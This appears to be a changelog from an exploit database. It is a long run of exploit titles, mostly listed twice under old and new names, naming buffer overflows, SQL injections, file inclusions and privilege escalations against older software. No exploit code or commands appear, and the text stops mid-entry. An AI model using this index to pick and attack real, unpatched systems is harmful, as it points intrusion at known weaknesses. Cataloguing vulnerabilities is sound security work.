DB: 2016-10-28

6 new exploits Real Server < 8.0.2 - Remote Exploit (Windows Platforms) RealServer < 8.0.2 - Remote Exploit (Windows Platforms) OpenSSH/PAM 3.6.1p1 - Remote Users Ident (gossh.sh) OpenSSH/PAM 3.6.1p1 - 'gossh.sh' Remote Users Ident CdRecord 2.0 - Mandrake Privilege Escalation CDRTools CDRecord 2.0 - Mandrake Privilege Escalation LeapFTP 2.7.x - Remote Buffer Overflow LeapWare LeapFTP 2.7.x - Remote Buffer Overflow GNU Cfengine 2.-2.0.3 - Remote Stack Overflow GNU CFEngine 2.-2.0.3 - Remote Stack Overflow IA WebMail 3.x - 'iaregdll.dll 1.0.0.5' Remote Exploit IA WebMail Server 3.x - 'iaregdll.dll 1.0.0.5' Remote Exploit Xsok 1.02 - '-xsokdir' Local Buffer Overflow Game Exploit XSOK 1.02 - '-xsokdir' Local Buffer Overflow Game Exploit Serv-U FTPD 3.x/4.x - 'SITE CHMOD' Command Remote Exploit RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Command Remote Exploit GateKeeper Pro 4.7 - Web proxy Remote Buffer Overflow PSOProxy 0.91 - Remote Buffer Overflow (Windows 2000/XP) IPSwitch IMail LDAP Daemon - Remote Buffer Overflow Serv-U FTPD 3.x/4.x/5.x - (MDTM) Remote Overflow Proxy-Pro Professional GateKeeper Pro 4.7 - Web proxy Remote Buffer Overflow PSOProxy 0.91 (Windows 2000/XP) - Remote Buffer Overflow IPSwitch IMail LDAP Daemon/Service - Buffer Overflow RhinoSoft Serv-U FTPd Server 3.x/4.x/5.x - (MDTM) Remote Overflow Traceroute - Privilege Escalation LBL Traceroute - Privilege Escalation Perl (Redhat 6.2) - Restore and Dump Local Exploit Redhat 6.2 Restore and Dump - Local Exploit (Perl) HP-UX 11.00/10.20 - crontab Overwrite Files Exploit Solaris/SPARC 2.7 / 7 - locale Format String HP-UX 11.00/10.20 crontab - Overwrite Files Exploit Solaris/SPARC 2.7 / 7 locale - Format String Solaris - locale Format Strings (noexec stack) Exploit Solaris locale - Format Strings (noexec stack) Exploit glibc - locale bug mount Exploit GLIBC locale - bug mount Exploit Red Hat 6.2 xsoldier-0.96 - Exploit Red Hat 6.2 xsoldier 0.96 - Exploit OpenBSD 2.6 / 2.7 ftpd - Remote Exploit OpenBSD ftpd 2.6 / 2.7 - Remote Exploit GLIBC - Locale Format Strings Exploit GLIBC locale - Format Strings Exploit IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) - /usr/lib/print/netprint Local Exploit IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - /usr/lib/print/netprint Local Exploit SquirrelMail - chpasswd Buffer Overflow SquirrelMail - 'chpasswd' Buffer Overflow rlpr 2.04 - msg() Remote Format String Rlpr 2.04 - msg() Remote Format String Solaris 2.5.0/2.5.1 ps & chkey - Data Buffer Exploit Solaris 2.5.0/2.5.1 ps / chkey - Data Buffer Exploit IRIX - Multiple Buffer Overflows (LsD) SGI IRIX - Multiple Buffer Overflows (LsD) IRIX - /bin/login Local Buffer Overflow SGI IRIX - /bin/login Local Buffer Overflow Solaris 2.4 - passwd & yppasswd & nispasswd Overflows Solaris 2.4 passwd / yppasswd / nispasswd - Overflows BlackJumboDog - Remote Buffer Overflow BlackJumboDog FTP Server - Remote Buffer Overflow Ollydbg 1.10 - Format String OllyDbg 1.10 - Format String SquirrelMail - (chpasswd) Privilege Escalation (Brute Force Exploit) SquirrelMail - 'chpasswd' Privilege Escalation (Brute Force Exploit) CDRecord - '$RSH' exec() SUID Shell Creation CDRecord's ReadCD - '$RSH' exec() SUID Shell Creation MDaemon 6.5.1 - IMAP/SMTP Remote Buffer Overflow Alt-N MDaemon 6.5.1 - IMAP/SMTP Remote Buffer Overflow HP-UX 11.0/11.11 swxxx - Privilege Escalation HP-UX 11.0/11.11 - swxxx Privilege Escalation Zinf 2.2.1 - Local Buffer Overflow Zinf Audio Player 2.2.1 - Local Buffer Overflow ShixxNote 6.net - Remote Buffer Overflow ShixxNOTE 6.net - Remote Buffer Overflow MailCarrier 2.51 - SMTP EHLO / HELO Buffer Overflow TABS MailCarrier 2.51 - SMTP EHLO / HELO Buffer Overflow MailCarrier 2.51 - Remote Buffer Overflow SLMail 5.5 - POP3 PASS Buffer Overflow TABS MailCarrier 2.51 - Remote Buffer Overflow Seattle Lab Mail (SLMail) 5.5 - POP3 PASS Buffer Overflow eZshopper - 'loadpage.cgi' Directory Traversal Alex Heiphetz Group eZshopper - 'loadpage.cgi' Directory Traversal Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow (1) Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow (1) Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow (2) Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow (2) Microsoft Internet Explorer - '.ANI' files handling Universal Exploit (MS05-002) Microsoft Internet Explorer - '.ANI' Universal Exploit (MS05-002) Microsoft Internet Explorer - '.ANI' files handling Downloader Exploit (MS05-002) Microsoft Internet Explorer - '.ANI' Downloader Exploit (MS05-002) Savant Web Server 3.1 - Remote Buffer Overflow (French Windows OS support) Savant Web Server 3.1 (French Windows OS support) - Remote Buffer Overflow Serv-U FTP Server 4.x - 'site chmod' Remote Buffer Overflow RhinoSoft Serv-U FTPd Server 4.x - 'site chmod' Remote Buffer Overflow Knet 1.04c - Buffer Overflow Denial of Service KNet Web Server 1.04c - Buffer Overflow Denial of Service Einstein 1.01 - Local Password Disclosure (asm) Einstein 1.01 - Local Password Disclosure (ASM) RealPlayer 10 - '.smil' Local Buffer Overflow RealNetworks RealPlayer 10 - '.smil' Local Buffer Overflow phpBB 2.0.12 - Session Handling Authentication Bypass (tutorial 2) phpBB 2.0.12 - Session Handling Authentication Bypass UBB Threads < 6.5.2 Beta - (mailthread.php) SQL Injection UBBCentral UBB.Threads < 6.5.2 Beta - (mailthread.php) SQL Injection XML-RPC Library 1.3.0 - (xmlrpc.php) Remote Code Injection XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Code Injection xmlrpc.php Library 1.3.0 - Remote Command Execution (2) xmlrpc.php Library 1.3.0 - Remote Command Execution (3) XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Command Execution (2) XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Command Execution (3) wMailServer 1.0 - Remote Denial of Service SoftiaCom wMailServer 1.0 - Remote Denial of Service ZENworks 6.5 Desktop/Server Management - Remote Stack Overflow (Metasploit) Novell ZENworks 6.5 - Desktop/Server Management Remote Stack Overflow (Metasploit) BusinessMail 4.60.00 - Remote Buffer Overflow BusinessMail Server 4.60.00 - Remote Buffer Overflow WebAdmin 2.0.4 - USER Buffer Overflow (Metasploit) Alt-N WebAdmin 2.0.4 - USER Buffer Overflow (Metasploit) Wireless Tools 26 - (iwconfig) Privilege Escalation (some setuid) Wireless Tools 26 (IWConfig) - Privilege Escalation (some setuid) Mercury Mail 4.01a (Pegasus) - IMAP Buffer Overflow Mercury/32 Mail Server 4.01a (Pegasus) - IMAP Buffer Overflow CA iGateway - (debug mode) Remote Buffer Overflow CA iTechnology iGateway - (debug mode) Remote Buffer Overflow Sami FTP Server 2.0.1 - Remote Stack Based Buffer Overflow (PoC) KarjaSoft Sami FTP Server 2.0.1 - Remote Stack Based Buffer Overflow (PoC) Sami FTP Server 2.0.1 - Remote Buffer Overflow (Metasploit) KarjaSoft Sami FTP Server 2.0.1 - Remote Buffer Overflow (Metasploit) Sami FTP Server 2.0.1 - Remote Buffer Overflow (cpp) KarjaSoft Sami FTP Server 2.0.1 - Remote Buffer Overflow (cpp) Zorum Forum 3.5 - (rollid) SQL Injection Zorum Forum 3.5 - 'rollid' SQL Injection SaphpLesson 2.0 - (forumid) SQL Injection saPHP Lesson 2.0 - (forumid) SQL Injection zawhttpd 0.8.23 - (GET) Remote Buffer Overflow Denial of Service zawhttpd 0.8.23 - GET Remote Buffer Overflow Denial of Service Zix Forum 1.12 - (layid) SQL Injection Zix Forum 1.12 - 'layid' SQL Injection QBik Wingate 6.1.1.1077 - (POST) Remote Buffer Overflow QBik WinGate WWW Proxy Server 6.1.1.1077 - (POST) Remote Buffer Overflow INDEXU 5.0.1 - (admin_template_path) Remote File Inclusion Indexu 5.0.1 - (admin_template_path) Remote File Inclusion SmartSiteCMS 1.0 - (root) Multiple Remote File Inclusion SmartSite CMS 1.0 - (root) Multiple Remote File Inclusion Solaris 10 - sysinfo() Local Kernel Memory Disclosure Solaris 10 sysinfo() - Local Kernel Memory Disclosure SAPID CMS 1.2.3.05 - 'ROOT_PATH' Remote File Inclusion SAPID 1.2.3.05 - 'ROOT_PATH' Remote File Inclusion ZZ:FlashChat 3.1 - (adminlog) Remote File Inclusion ZZ:FlashChat 3.1 - 'adminlog' Remote File Inclusion WFTPD 3.23 - (SIZE) Remote Buffer Overflow Texas Imperial Software WFTPD 3.23 - (SIZE) Remote Buffer Overflow Apache < 1.3.37 / 2.0.59 / 2.2.3 - (mod_rewrite) Remote Overflow (PoC) Apache (mod_rewrite) < 1.3.37 / 2.0.59 / 2.2.3 - Remote Overflow (PoC) Tr Forum 2.0 - SQL Injection / Bypass Security Restriction Exploit TR Forum 2.0 - SQL Injection / Bypass Security Restriction Exploit X11R6 <= 6.4 XKEYBOARD (solaris/x86) - Local Buffer Overflow X11R6 <= 6.4 XKEYBOARD (sco/x86) - Local Buffer Overflow X11R6 <= 6.4 XKEYBOARD (solaris x86) - Local Buffer Overflow X11R6 <= 6.4 XKEYBOARD (sco x86) - Local Buffer Overflow Signkorn Guestbook 1.3 - (dir_path) Remote File Inclusion Telekorn Signkorn Guestbook 1.3 - (dir_path) Remote File Inclusion ZoomStats 1.0.2 - (mysql.php) Remote File Inclusion ZoomStats 1.0.2 - 'mysql.php' Remote File Inclusion Microsoft Internet Explorer (VML) - Remote Buffer Overflow (SP2) (Perl) Microsoft Internet Explorer - (VML) Remote Buffer Overflow (SP2) (Perl) PHPMyWebmin 1.0 - (window.php) Remote File Inclusion phpMyWebmin 1.0 - (window.php) Remote File Inclusion VideoDB 2.2.1 - (pdf.php) Remote File Inclusion VideoDB 2.2.1 - 'pdf.php' Remote File Inclusion Microsoft Office 2003 - PPT Local Buffer Overflow (PoC) Microsoft Office 2003 - '.PPT' Local Buffer Overflow (PoC) Solaris 10 libnspr - LD_PRELOAD Arbitrary File Creation Privilege Escalation Solaris 10 (libnspr) - LD_PRELOAD Arbitrary File Creation Privilege Escalation Solaris 10 libnspr - Constructor Privilege Escalation Solaris 10 (libnspr) - Constructor Privilege Escalation Microsoft Windows NAT Helper Components - 'ipnathlp.dll' Remote Denial of Service Microsoft Windows - NAT Helper Components 'ipnathlp.dll' Remote Denial of Service 3Com TFTP Service 2.0.1 - 'Long Transporting Mode' Overflow (PoC) 3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow (PoC) 3Com TFTP Service 2.0.1 - 'Long Transporting Mode' Overflow Exploit 3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow Exploit BlazeVideo HDTV Player 2.1 - Malformed PLF Buffer Overflow (PoC) BlazeVideo HDTV Player 2.1 - Malformed '.PLF' Buffer Overflow (PoC) AT-TFTP 1.9 - (Long Filename) Remote Buffer Overflow Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - (Long Filename) Remote Buffer Overflow DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow AstonSoft DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow KDE 3.5 - (libkhtml) 4.2.0 / Unhandled HTML Parse Exception Exploit KDE libkhtml 3.5 < 4.2.0 - Unhandled HTML Parse Exception Exploit Irokez CMS 0.7.1 - Multiple Remote File Inclusion Irokez Blog 0.7.1 - Multiple Remote File Inclusion PHP-update 2.7 - Multiple Vulnerabilities PHP-Update 2.7 - Multiple Vulnerabilities Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow (PoC) KarjaSoft Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow (PoC) TFTPDWIN 0.4.2 - Remote Buffer Overflow ProSysInfo TFTP server TFTPDWIN 0.4.2 - Remote Buffer Overflow Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow KarjaSoft Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow 3Com TFTP Service 2.0.1 - Remote Buffer Overflow (Metasploit) 3Com TFTP Service (3CTftpSvc) 2.0.1 - Remote Buffer Overflow (Metasploit) FdScript 1.3.2 - 'download.php' Remote File Disclosure FD Script 1.3.2 - 'download.php' Remote File Disclosure Imail 8.10-8.12 - (RCPT TO) Remote Buffer Overflow Imail 8.10-8.12 - (RCPT TO) Remote Buffer Overflow (Metasploit) Ipswitch IMail Server 8.10-8.12 - (RCPT TO) Remote Buffer Overflow Ipswitch IMail Server 8.10-8.12 - (RCPT TO) Remote Buffer Overflow (Metasploit) SunOS 5.10/5.11 - in.TelnetD Remote Authentication Bypass SunOS 5.10/5.11 in.TelnetD - Remote Authentication Bypass ZebraFeeds 1.0 - (zf_path) Remote File Inclusion ZebraFeeds 1.0 - 'zf_path' Remote File Inclusion MailEnable Enterprise 2.32 < 2.34 - Remote Buffer Overflow MailEnable Professional 2.35 - Remote Buffer Overflow MailEnable IMAPD Enterprise 2.32 < 2.34 - Remote Buffer Overflow MailEnable IMAPD Professional 2.35 - Remote Buffer Overflow Ipswitch WS_FTP 5.05 - (XMD5) Remote Buffer Overflow (Metasploit) Ipswitch WS_FTP Server 5.05 - (XMD5) Remote Buffer Overflow (Metasploit) Oracle 10g KUPW$WORKER.MAIN - SQL Injection (2) Oracle 10g - KUPW$WORKER.MAIN SQL Injection (2) 3Com TFTP Service 2.0.1 - (Long Transporting Mode) Exploit (Perl) madwifi 0.9.2.1 - WPA/RSN IE Remote Kernel Buffer Overflow 3Com TFTP Service (3CTftpSvc) 2.0.1 - (Long Transporting Mode) Exploit (Perl) Madwifi 0.9.2.1 - WPA/RSN IE Remote Kernel Buffer Overflow TFTPDWIN Server 0.4.2 - (UDP) Denial of Service ProSysInfo TFTP Server TFTPDWIN 0.4.2 - (UDP) Denial of Service NetVios Portal - 'page.asp' SQL Injection NetVIOS Portal - 'page.asp' SQL Injection Mercury Mail 4.0.1 - 'LOGIN' Remote IMAP Stack Buffer Overflow Mercury/32 Mail Server 4.0.1 - 'LOGIN' Remote IMAP Stack Buffer Overflow Apache Mod_Rewrite (Windows x86) - Off-by-One Remote Overflow Apache (mod_rewrite) (Windows x86) - Off-by-One Remote Overflow Microsoft Windows GDI - Privilege Escalation (MS07-017) (1) Microsoft Windows - GDI Privilege Escalation (MS07-017) (1) qdblog 0.4 - (SQL Injection / Local File Inclusion) Multiple Vulnerabilities Quick and Dirty Blog (qdblog) 0.4 - (SQL Injection / Local File Inclusion) Multiple Vulnerabilities Microsoft Windows GDI - Privilege Escalation (MS07-017) (2) Microsoft Windows - GDI Privilege Escalation (MS07-017) (2) Zomplog 3.8 - (force_download.php) Remote File Disclosure Zomplog 3.8 - 'force_download.php' Remote File Disclosure Versalsoft HTTP File Upload - ActiveX 6.36 (AddFile) Remote Denial of Service Versalsoft HTTP File Uploader - ActiveX 6.36 (AddFile) Remote Denial of Service Gimp 2.2.14 (Win x86) - '.ras' Download/Execute Buffer Overflow GIMP 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow UltraISO 8.6.2.2011 - (Cue/Bin Files) Local Buffer Overflow (PoC) UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (PoC) Apache 2.0.58 Mod_Rewrite - Remote Overflow (Windows 2003) Apache (mod_rewrite) 2.0.58 (Windows 2003) - Remote Overflow UltraISO 8.6.2.2011 - (Cue/Bin Files) Local Buffer Overflow (1) UltraISO 8.6.2.2011 - (Cue/Bin Files) Local Buffer Overflow (2) UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (1) UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (2) Microsoft Windows GDI+ - ICO File Remote Denial of Service Microsoft Windows - GDI+ '.ICO' File Remote Denial of Service Safari 3 for Windows Beta - Remote Command Execution (PoC) Apple Safari 3 for Windows Beta - Remote Command Execution (PoC) YourFreeScreamer 1.0 - (serverPath) Remote File Inclusion YourFreeScreamer 1.0 - 'serverPath' Remote File Inclusion BarCode ActiveX Control 'BarCodeAx.dll' 4.9 - Remote Overflow RKD Software BarCode ActiveX Control 'BarCodeAx.dll' 4.9 - Remote Overflow PHPEventCalendar 0.2.3 - (eventdisplay.php) SQL Injection phpEventCalendar 0.2.3 - (eventdisplay.php) SQL Injection Oracle 9i/10g Evil Views - Change Passwords Exploit Oracle 9i/10g - Evil Views Change Passwords Exploit Savant 3.1 - GET Request Remote Overflow (Universal) Savant Web Server 3.1 - GET Request Remote Overflow (Universal) Easy Chat Server 2.2 - Remote Denial of Service EFS Easy Chat Server 2.2 - Remote Denial of Service Mercury SMTPD - Remote Unauthenticated Stack Based Overrun (PoC) Mercury/32 Mail SMTPD - Remote Unauthenticated Stack Based Overrun (PoC) Mercury/32 4.51 - SMTPD CRAM-MD5 Unauthenticated Remote Overflow Mercury/32 Mail SMTPD 4.51 - SMTPD CRAM-MD5 Unauthenticated Remote Overflow Mercury/32 3.32-4.51 - SMTP Unauthenticated EIP Overwrite Mercury/32 Mail Server 3.32<4.51 - SMTP Unauthenticated EIP Overwrite Thomson SIP phone ST 2030 - Remote Denial of Service Thomson SpeedTouch ST 2030 (SIP Phone) - Remote Denial of Service MSN messenger 7.x (8.0?) - Video Remote Heap Overflow Microsoft MSN Messenger 7.x (8.0?) - Video Remote Heap Overflow Microsoft Visual Basic Enterprise Edition 6.0 SP6 - Code Execution Microsoft Visual Basic Enterprise 6.0 SP6 - Code Execution AskJeeves Toolbar 4.0.2.53 - ActiveX Remote Buffer Overflow Ask.com/AskJeeves Toolbar Toolbar 4.0.2.53 - ActiveX Remote Buffer Overflow MDPro 1.0.76 - SQL Injection MD-Pro 1.0.76 - SQL Injection ZZ FlashChat 3.1 - (help.php) Local File Inclusion ZZ FlashChat 3.1 - 'help.php' Local File Inclusion PHP-AGTC membership system 1.1a - Remote Add Admin PHP-AGTC Membership System 1.1a - Remote Add Admin Quick and Dirty Blog 0.4 - (categories.php) Local File Inclusion Quick and Dirty Blog (qdblog) 0.4 - (categories.php) Local File Inclusion badblue 2.72b - Multiple Vulnerabilities BadBlue 2.72b - Multiple Vulnerabilities SquirrelMail G/PGP Plugin - deletekey() Command Injection SquirrelMail G/PGP Encryption Plugin - deletekey() Command Injection hp software update client 3.0.8.4 - Multiple Vulnerabilities HP Software Update Client 3.0.8.4 - Multiple Vulnerabilities Microsoft Visual InterDev 6.0-SP6 - '.sln' Local Buffer Overflow Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow QuickTime Player 7.3.1.70 - RTSP Remote Buffer Overflow (PoC) QuickTime Player 7.3.1.70 - 'RTSP' Remote Buffer Overflow (PoC) Gradman 0.1.3 - (agregar_info.php) Local File Inclusion Gradman 0.1.3 - 'agregar_info.php' Local File Inclusion mybulletinboard (MyBB) 1.2.10 - Multiple Vulnerabilities MyBulletinBoard (MyBB) 1.2.10 - Multiple Vulnerabilities Mini File Host 1.2 - (upload.php language) Local File Inclusion Crystal Reports XI Release 2 - (Enterprise Tree Control) ActiveX Buffer Overflow/Denial of Service Mini File Host 1.2 - 'language' Parameter Local File Inclusion Crystal Reports XI Release 2 (Enterprise Tree Control) - ActiveX Buffer Overflow/Denial of Service Gradman 0.1.3 - (info.php tabla) Local File Inclusion Small Axe 0.3.1 - (linkbar.php cfile) Remote File Inclusion Microsoft Visual Basic Enterprise Ed. 6 SP6 - '.dsr' File Handling Buffer Overflow Gradman 0.1.3 - 'info.php' Local File Inclusion Small Axe 0.3.1 - 'cfile' Parameter Remote File Inclusion Microsoft Visual Basic Enterprise 6 SP6 - '.dsr' File Handling Buffer Overflow Mini File Host 1.2.1 - (upload.php language) Local File Inclusion Mini File Host 1.2.1 - 'language' Parameter Local File Inclusion Frimousse 0.0.2 - explorerdir.php Local Directory Traversal 360 Web Manager 3.0 - (IDFM) SQL Injection bloofox 0.3 - (SQL Injection / File Disclosure) Multiple Vulnerabilities Frimousse 0.0.2 - 'explorerdir.php' Local Directory Traversal 360 Web Manager 3.0 - 'IDFM' Parameter SQL Injection bloofox 0.3 - SQL Injection / File Disclosure Mooseguy Blog System 1.0 - (blog.php month) SQL Injection Mooseguy Blog System 1.0 - 'month' Parameter SQL Injection IDM-OS 1.0 - (download.php Filename) File Disclosure IDM-OS 1.0 - 'Filename' Parameter File Disclosure MoinMoin 1.5.x - MOIND_ID cookie Bug Remote Exploit aflog 1.01 - comments.php Cross-Site Scripting / SQL Injection MoinMoin 1.5.x - 'MOIND_ID' Cookie Bug Remote Exploit aflog 1.01 - Cross-Site Scripting / SQL Injection Easysitenetwork Recipe - 'categoryId' SQL Injection Coppermine Photo Gallery 1.4.14 - SQL Injection Easysitenetwork Recipe - 'categoryId' Parameter SQL Injection Coppermine Photo Gallery 1.4.10 - SQL Injection web wiz rich text editor 4.0 - Multiple Vulnerabilities Web Wiz Rich Text Editor 4.0 - Multiple Vulnerabilities Seagull 0.6.3 - (optimizer.php files) Remote File Disclosure Seagull 0.6.3 - 'optimizer.php' Remote File Disclosure Joomla! Component Marketplace 1.1.1 - SQL Injection Joomla! Component com_Marketplace 1.1.1 - SQL Injection ASPapp - 'links.asp CatId' SQL Injection ASPapp Knowledge Base - 'links.asp CatId' SQL Injection ZYXEL ZyWALL Quagga/Zebra - (default pass) Remote Root Exploit ZYXEL ZyWALL Quagga/Zebra - (Default Password) Remote Root Exploit Quick TFTP Pro 2.1 - Remote SEH Overflow Quick TFTP Server Pro 2.1 - Remote SEH Overflow Microsoft Office XP SP3 - PPT File Buffer Overflow (MS08-016) Microsoft Office XP SP3 - '.PPT' File Buffer Overflow (MS08-016) HP OpenView NNM 7.5.1 - OVAS.exe SEH Unauthenticated Overflow HP OpenView Network Node Manager (OV NNM) 7.5.1 - OVAS.exe SEH Unauthenticated Overflow Microsoft Visual InterDev 6.0 - (SP6) SLN File Local Buffer Overflow (PoC) Microsoft Visual InterDev 6.0 (SP6) - .SLN File Local Buffer Overflow (PoC) Microsoft Visual Basic Enterprise Ed. 6 SP6 - '.DSR' File Local Buffer Overflow Microsoft Visual Basic Enterprise 6 SP6 - '.DSR' File Local Buffer Overflow hp openview nnm 7.53 - Multiple Vulnerabilities HP OpenView Network Node Manager (OV NNM) 7.53 - Multiple Vulnerabilities PHPKB 1.5 Knowledge Base - 'ID' SQL Injection PHPKB Knowledge Base Software 1.5 - 'ID' SQL Injection Microsoft Windows GDI - Image Parsing Stack Overflow (MS08-021) Microsoft Windows - GDI Image Parsing Stack Overflow (MS08-021) HP OpenView NNM 7.5.1 - ovalarmsrv.exe Remote Overflow HP OpenView Network Node Manager (OV NNM) 7.5.1 - ovalarmsrv.exe Remote Overflow siteman 2.x - (Code Execution / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities Siteman 2.x - (Code Execution / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities ZeusCart 2.0 - (category_list.php) SQL Injection ZeusCart 2.0 - 'category_list.php' SQL Injection Zomplog 3.8.2 - (newuser.php) Arbitrary Add Admin Zomplog 3.8.2 - 'newuser.php' Arbitrary Add Admin Zomplog 3.8.2 - (force_download.php) File Disclosure Zomplog 3.8.2 - 'force_download.php' File Disclosure PHP AGTC-Membership System 1.1a - Arbitrary Add Admin PHP-AGTC Membership System 1.1a - Arbitrary Add Admin PHP Booking Calendar 10 d - SQL Injection phpBookingCalendar 10 d - SQL Injection SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC) Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC) Yuhhu 2008 SuperStar - (board) SQL Injection Yuhhu 2008 SuperStar - 'board' SQL Injection gravity board x 2.0 Beta - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities Gravity Board X 2.0 Beta - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities gl-sh deaf forum 6.5.5 - Multiple Vulnerabilities GL-SH Deaf Forum 6.5.5 - Multiple Vulnerabilities Safari / QuickTime 7.3 - RTSP Content-Type Remote Buffer Overflow Apple Safari / QuickTime 7.3 - RTSP Content-Type Remote Buffer Overflow trixbox - (langChoice) Local File Inclusion (connect-back) (2) Trixbox - (langChoice) Local File Inclusion (connect-back) (2) Download Accelerator Plus - DAP 8.x m3u File Buffer Overflow Download Accelerator Plus DAP 8.x - '.m3u' File Buffer Overflow Artic Issue Tracker 2.0.0 - (index.php filter) SQL Injection Arctic Issue Tracker 2.0.0 - (index.php filter) SQL Injection Ppim 1.0 - (Arbitrary File Delete / Cross-Site Scripting) Multiple Vulnerabilities pPIM 1.0 - (Arbitrary File Delete / Cross-Site Scripting) Multiple Vulnerabilities Cisco WebEx Meeting Manager - 'atucfobj.dll' ActiveX Remote Buffer Overflow Cisco WebEx Meeting Manager UCF - 'atucfobj.dll' ActiveX Remote Buffer Overflow Ppim 1.0 - (upload/change Password) Multiple Vulnerabilities pPIM 1.0 - (upload/change Password) Multiple Vulnerabilities z-breaknews 2.0 - (single.php) SQL Injection z-breaknews 2.0 - 'single.php' SQL Injection Ultra Office - ActiveX Control Remote Buffer Overflow Ultra Shareware Office Control - ActiveX Control Remote Buffer Overflow Micrsoft Windows GDI - (CreateDIBPatternBrushPt) Heap Overflow (PoC) Microsoft Windows - GDI (CreateDIBPatternBrushPt) Heap Overflow (PoC) phpvid 1.1 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities Zanfi CMS lite / Jaw Portal free - (page) SQL Injection phpVID 1.1 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities Zanfi CMS lite / Jaw Portal free - 'page' SQL Injection Microsoft Windows Media Encoder XP SP2 - 'wmex.dll' ActiveX Buffer Overflow (MS08-053) Microsoft Windows Media Encoder (Windows XP SP2) - 'wmex.dll' ActiveX Buffer Overflow (MS08-053) QuickTime 7.5.5 / iTunes 8.0 - Remote Off-by-One Crash Apple QuickTime 7.5.5 / iTunes 8.0 - Remote Off-by-One Crash Microsoft Windows GDI+ - '.ico' Remote Division By Zero Exploit Microsoft Windows - GDI+ '.ico' Remote Division By Zero Exploit Microsoft Windows GDI - (EMR_COLORMATCHTOTARGETW) Exploit (MS08-021) Microsoft Windows - GDI (EMR_COLORMATCHTOTARGETW) Exploit (MS08-021) opennms < 1.5.96 - Multiple Vulnerabilities OpenNMS < 1.5.96 - Multiple Vulnerabilities yerba sacphp 6.3 - Multiple Vulnerabilities Yerba SACphp 6.3 - Multiple Vulnerabilities Microsoft Windows GDI+ - PoC (MS08-052) (2) Microsoft Windows - GDI+ PoC (MS08-052) (2) zeeproperty - (adid) SQL Injection zeeproperty - 'adid' SQL Injection TUGzip 3.00 archiver - '.zip' Local Buffer Overflow TugZip 3.00 Archiver - '.zip' Local Buffer Overflow AJ ARTICLE - 'featured_article.php mode' SQL Injection AJ Article - 'featured_article.php mode' SQL Injection Article Publisher PRO 1.5 - Insecure Cookie Handling Graugon PHP Article Publisher Pro 1.5 - Insecure Cookie Handling YourFreeWorld Classifieds - (category) SQL Injection YourFreeWorld Classifieds - 'category' SQL Injection PG Roomate Finder Solution - (Authentication Bypass) SQL Injection Pilot Group PG Roommate Finder Solution - (Authentication Bypass) SQL Injection iTunes 8.0.2.20/QuickTime 7.5.5 - (.mov) Multiple Off By Overflow (PoC) Apple iTunes 8.0.2.20/QuickTime 7.5.5 - (.mov) Multiple Off By Overflow (PoC) asp AutoDealer - (SQL Injection / File Disclosure) Multiple Vulnerabilities ASP AutoDealer - (SQL Injection / File Disclosure) Multiple Vulnerabilities Professional Download Assistant 0.1 - (Authentication Bypass) SQL Injection dotnetindex Professional Download Assistant 0.1 - (Authentication Bypass) SQL Injection phpmygallery 1.0beta2 - (Remote File Inclusion / Local File Inclusion) Multiple Vulnerabilities PHPmyGallery 1.0beta2 - (Remote File Inclusion / Local File Inclusion) Multiple Vulnerabilities Safari - 'ARGUMENTS' Array Integer Overflow PoC (New Heap Spray) Apple Safari - 'ARGUMENTS' Array Integer Overflow PoC (New Heap Spray) Hex Workshop 6.0 - (ColorMap files .cmap) Invalid Memory Reference (PoC) Hex Workshop 6.0 - '.cmap' Invalid Memory Reference (PoC) ProFTPd with mod_mysql - Authentication Bypass ProFTPd - 'mod_mysql' Authentication Bypass ppim 1.0 - Multiple Vulnerabilities pPIM 1.0 - Multiple Vulnerabilities Orbit 2.8.4 - Long Hostname Remote Buffer Overflow Orbit Downloader 2.8.4 - Long Hostname Remote Buffer Overflow Merak Media PLayer 3.2 - '.m3u' File Local Buffer Overflow (SEH) Merak Media Player 3.2 - '.m3u' File Local Buffer Overflow (SEH) Media Commands - '.m3u' / '.m3l' / '.TXT' / '.LRC' Files Local Heap Overflow (PoC) Media Commands - '.m3u' / '.m3l' / '.TXT' / '.LRC' Local Heap Overflow (PoC) bloginator 1a - (Cookie Bypass / SQL Injection) Multiple Vulnerabilities Bloginator 1a - (Cookie Bypass / SQL Injection) Multiple Vulnerabilities Racer 0.5.3b5 - Remote Stack Buffer Overflow Racer 0.5.3 Beta 5 - Remote Stack Buffer Overflow Safari 3.2.2/4b - (nested elements) XML Parsing Remote Crash Apple Safari 3.2.2/4b - (nested elements) XML Parsing Remote Crash Gravity Board X 2.0b - SQL Injection / Authenticated Code Execution Gravity Board X 2.0 Beta - 